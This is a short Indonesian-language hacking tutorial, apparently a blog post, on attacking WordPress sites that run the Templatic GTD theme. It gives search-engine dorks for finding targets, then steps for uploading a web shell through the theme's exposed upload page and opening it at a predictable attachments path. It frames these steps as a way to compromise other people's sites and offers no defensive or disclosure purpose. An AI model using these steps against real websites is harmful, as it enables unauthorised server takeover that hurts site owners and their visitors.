exploit ini mirip dengan exploit wpstore
dork :
inurl:"/wp-content/themes/GTD/"
intext:"powered by WordPress. GTD theme by Templatic."
(coba explore websitenya, pasti dapat dork baru)
lanjut caranya :
1. cari target menggunakan dork di atas ato terserah
2. ganti alamat websitenya menjadi seperti ini :
target.com/wp-content/themes/GTD/upload/
maka tampilannya akan seperti ini :
3. upload shell mu, lalu akses di
target.com/wp-content/themes/GTD/attachments/shell.php
hasilnya :
refrensi : explorecrew
semoga bermanfaat, terima kasih ^_^